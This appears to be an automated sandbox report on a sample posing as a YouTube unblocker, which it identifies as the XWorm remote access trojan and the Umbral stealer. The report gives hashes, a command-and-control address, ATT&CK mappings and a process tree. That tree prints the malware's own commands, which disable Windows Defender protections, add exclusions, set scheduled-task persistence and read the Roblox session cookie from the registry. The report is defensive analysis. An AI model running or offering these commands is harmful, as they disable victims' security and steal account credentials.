Overview

overview

10

Static

static

3

UnblоckYT .exe

windows7-x64

10

UnblоckYT .exe

windows10-2004-x64

Analysis

  • max time kernel
    162s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2024 09:06

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    UnblоckYT .exe

  • Size

    2.0MB

  • MD5

    9507d39a1268cc9bc49a89a5b6b1efde

  • SHA1

    62919a92df361ec9f797066b8fd025d7e07c2795

  • SHA256

    d815fcc722bee4f1025644dce314ce8c0b41d05491fd1e3c382a3b403564075f

  • SHA512

    ffd75d68a7e8025c11922681b3214a8c96d70f7fd30f6eb7f6429e3865113f5406cc33ac76cd1580c03b64a52ff846c2c6e8d75968876ab7ac0625dd4873bbc0

  • SSDEEP

    49152:jDjlabwz9heWYJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:PqwuWYKeTv0q8bG55v3q5

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 10 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
    "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2984
      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4492
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1076
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1632
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2428
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1264
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4244
          • C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe
            "C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe"
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:548
            • C:\Windows\SYSTEM32\attrib.exe
              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe"
              6⤵
              • Views/modifies file attributes
              PID:3120
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1940
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3964
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3048
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5060
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
                PID:4376
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4416
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                6⤵
                • Detects videocard installed
                PID:2544
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe" && pause
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:708
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  7⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:5008
            • C:\Users\Admin\AppData\Local\Temp\zmsqlx.exe
              "C:\Users\Admin\AppData\Local\Temp\zmsqlx.exe"
              5⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              PID:4376
              • C:\Windows\SYSTEM32\attrib.exe
                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\zmsqlx.exe"
                6⤵
                • Views/modifies file attributes
                PID:3768
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zmsqlx.exe'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4952
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2160
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3752
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                6⤵
                  PID:3148
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic.exe" os get Caption
                  6⤵
                    PID:380
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" computersystem get totalphysicalmemory
                    6⤵
                      PID:3680
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic.exe" csproduct get uuid
                      6⤵
                        PID:2900
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:724
                      • C:\Windows\System32\Wbem\wmic.exe
                        "wmic" path win32_VideoController get name
                        6⤵
                        • Detects videocard installed
                        PID:3580
                      • C:\Windows\SYSTEM32\cmd.exe
                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\zmsqlx.exe" && pause
                        6⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        PID:3276
                        • C:\Windows\system32\PING.EXE
                          ping localhost
                          7⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:3452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2904
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:3320
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:4788
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:1460
                  • C:\Windows\system32\timeout.exe
                    timeout /t 2 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:4520
                  • C:\Windows\system32\timeout.exe
                    timeout /t 2 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:2216
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:3144
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:2900
                  • C:\Windows\system32\timeout.exe
                    timeout /t 2 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:2316
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:4444
                  • C:\Windows\system32\timeout.exe
                    timeout /t 3 /nobreak
                    4⤵
                    • Delays execution with timeout.exe
                    PID:2236
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              C:\Users\Admin\AppData\Roaming\svchost.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:5116
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              1⤵
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:3820
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              C:\Users\Admin\AppData\Roaming\svchost.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:3148
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              C:\Users\Admin\AppData\Roaming\svchost.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:620

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Hide Artifacts

            1
            T1564

            Hidden Files and Directories

            1
            T1564.001

            Modify Registry

            1
            T1112

            Credential Access

            Credentials from Password Stores

            1
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Peripheral Device Discovery

            1
            T1120

            Query Registry

            2
            T1012

            Remote System Discovery

            1
            T1018

            System Information Discovery

            4
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            System Network Configuration Discovery

            1
            T1016

            Internet Connection Discovery

            1
            T1016.001

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Web Service

            1
            T1102

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              968cb9309758126772781b83adb8a28f

              SHA1

              8da30e71accf186b2ba11da1797cf67f8f78b47c

              SHA256

              92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

              SHA512

              4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
              Filesize

              522B

              MD5

              8334a471a4b492ece225b471b8ad2fc8

              SHA1

              1cb24640f32d23e8f7800bd0511b7b9c3011d992

              SHA256

              5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

              SHA512

              56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              18KB

              MD5

              502c626acfd5e13a4d14d4e77ac2b197

              SHA1

              8450f3f4429beb3634bf3cb4b05e036f76da060f

              SHA256

              94a352578a55fc6fb4eba81d07109d578a61b62da9df8c8af2b04f34b08402ee

              SHA512

              3fca8aa62c7ee8d4d818e767d63f0e76b9d41ce2b25da4b86e936168eb7782a2d4791e8182d463a468c91ad578850a46472a47fe7101cee9547389332a96b2da

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              18KB

              MD5

              c716cdfc97eb42cb59c7d41d6e58cb4f

              SHA1

              90c4ab2b238d97dbd6a8df08b374595c774f9213

              SHA256

              fda13a439d188acdb2120dfa0f5aca663d338633d902b826fa695910322c55fd

              SHA512

              1281e011790b4165f4d8ee6bd97a6db0f94658c362f2772ac77f8f23edda475d662de0922964df6e033ecb3fdee42da6cf752ae7e9646dafc10e1b90aa6b2d22

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              18KB

              MD5

              865c7265e3d297724417989d420dbde2

              SHA1

              6198c08429c1a38e3c497c5c419006101f5de339

              SHA256

              03f94b170999ffc9b87be45f510f2a1a4eff2e814c308f59fa995510723e730b

              SHA512

              7736fadda2c521e4c6690bf4ece840094285218d95ff1d2e42530ab26a94271fe9596cf434cf27c6ce853762a6c30e427d68155c757cf5e5580d6bba9aa2aaa2

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              9b80cd7a712469a4c45fec564313d9eb

              SHA1

              6125c01bc10d204ca36ad1110afe714678655f2d

              SHA256

              5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

              SHA512

              ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              1a58f982c18490e622e00d4eb75ace5a

              SHA1

              60c30527b74659ecf09089a5a7c02a1df9a71b65

              SHA256

              4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

              SHA512

              ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              d3235ed022a42ec4338123ab87144afa

              SHA1

              5058608bc0deb720a585a2304a8f7cf63a50a315

              SHA256

              10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

              SHA512

              236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              5ff8b4b55e8fcd1c4b6794a290065ea3

              SHA1

              4087dcdff35b5857b157265e58a735e48772064f

              SHA256

              ecfa68c7e78fe5ba6d4a0404310a88eac2029063d675757c10b5efaecde8e6a9

              SHA512

              9cb89ec58309f1b15edfd0ea58b7b06ac2493c2790ee384a679e89b3115d4f9023ad3e6e0893f8559326546db9b2aaf28086c73828aa1c70ec34db5d8f4159fb

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              64B

              MD5

              c41224ab6e2a713aff7b0128890716be

              SHA1

              b3525f9c3f583284b084fb88ae14a803fad84e04

              SHA256

              ee0f2a4ee399ef57c54d83bd611d11fb22ce2edc405db819a2a371b8a5192fd2

              SHA512

              25c71ac3f2ee6b0ccadd7549b7d8a42a964d0305d8758dfae53ce78eeaf52432380715ff545d95645e0e00d3b3b6c678f17eb16b2e9606d64988ffde82dfbc4c

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              96ff1ee586a153b4e7ce8661cabc0442

              SHA1

              140d4ff1840cb40601489f3826954386af612136

              SHA256

              0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

              SHA512

              3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              5824a6037c081fda5d46de274b6e2799

              SHA1

              526367a09300cbde430e8fb44e41cbe7a0937aac

              SHA256

              4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

              SHA512

              a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              4950bb37b35849b09a86bc7c01c8952a

              SHA1

              f9650f41d105d3affa7b19d58ab336a92aab4793

              SHA256

              5d139a221345fe53f28d2a772c8e4c8e988925b6fc228c81baa98f824a44c67c

              SHA512

              5b39b845d6d53acd9a20fa1e3e081f7a4c5bbea4641ed53e6d1df8fb245a57e7a659cbdbdfe41ce642b6b2a7ff98b3dd3c9a5bcea7d226cead546d097f361a40

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              567d7fef99fd45b4def9fa7b093384e2

              SHA1

              e6a0a4657276cca5142193ad980e34d1ed382f41

              SHA256

              7ec7b5f3f860f6b4a326dcc883a2bd3f57bac0a5774418b48e3ef54c2cd2893c

              SHA512

              f45b7876ae0e3eac9dee187f2b901da361caf20e2aebc545408a95f6926a2b3a13233392d085487a76e6972784877637576bf8f9b644c0d59cea02f9177aa711

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              18KB

              MD5

              b58d63e9c4fb2ef43af673c62f41f2e6

              SHA1

              a236fc0b9b6e8068060e77851b4a82bf07b1f72c

              SHA256

              cee5efc0e54f3033a13f1c10250a49370db91e2a2a26691d3d67a0cb92d1c582

              SHA512

              ac0a80e5d228beab48d3bd6fc73935c530ee31e2afe6fbe2be3dd65451d0acb6085bb0e9cf7bb029c5d8da259fb225d37107004dce868fbb7f2ba81cb1263eb6

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sua3afad.fws.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tzvkiw.exe
              Filesize

              229KB

              MD5

              fed4a7197948ba327337b612254a673b

              SHA1

              2d1a9070dac7754ec592768654574fb933ec3730

              SHA256

              2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

              SHA512

              51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
              Filesize

              771B

              MD5

              ef415087500126ecf3abcffc9fbe0910

              SHA1

              7e980020aeb82b753f7a8e7319846755c7f040da

              SHA256

              fa2f046295b274f497f263a468fec2684a3ae685c9307476dec28c1537699a2f

              SHA512

              54a8e94333d0b095780b876058aa5c17d7ab85897193f941094a9b39fe270a07f0a67f3a4e7204dff87dd1f416bca59aeb7c1a81330404a747e9153cfb1649ad

              Download Submit

            • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
              Filesize

              1.8MB

              MD5

              ddf02dfa6df9ee4e157d675e55a055c7

              SHA1

              d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

              SHA256

              6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

              SHA512

              79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

              Download Submit

            • C:\Users\Admin\AppData\Roaming\YTunblock.exe
              Filesize

              1.2MB

              MD5

              5c130e0ea8b936a34372663dd763f722

              SHA1

              cbb1efd33b28851682ae3f9699c79ffe705c780d

              SHA256

              262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

              SHA512

              a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

              Download Submit

            • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
              Filesize

              1.6MB

              MD5

              10aefe8560bf4e437d2f47bd469a59ff

              SHA1

              57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

              SHA256

              56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

              SHA512

              d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

              Download Submit

            • C:\Users\Admin\AppData\Roaming\ .bat
              Filesize

              1KB

              MD5

              5807f01368bda72ebd943e8755fa2e0c

              SHA1

              f42940149bf0e256b14343c87f750c6cdac8ae72

              SHA256

              9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

              SHA512

              31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

              Download Submit

            • C:\Windows\System32\drivers\etc\hosts
              Filesize

              2KB

              MD5

              4028457913f9d08b06137643fe3e01bc

              SHA1

              a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

              SHA256

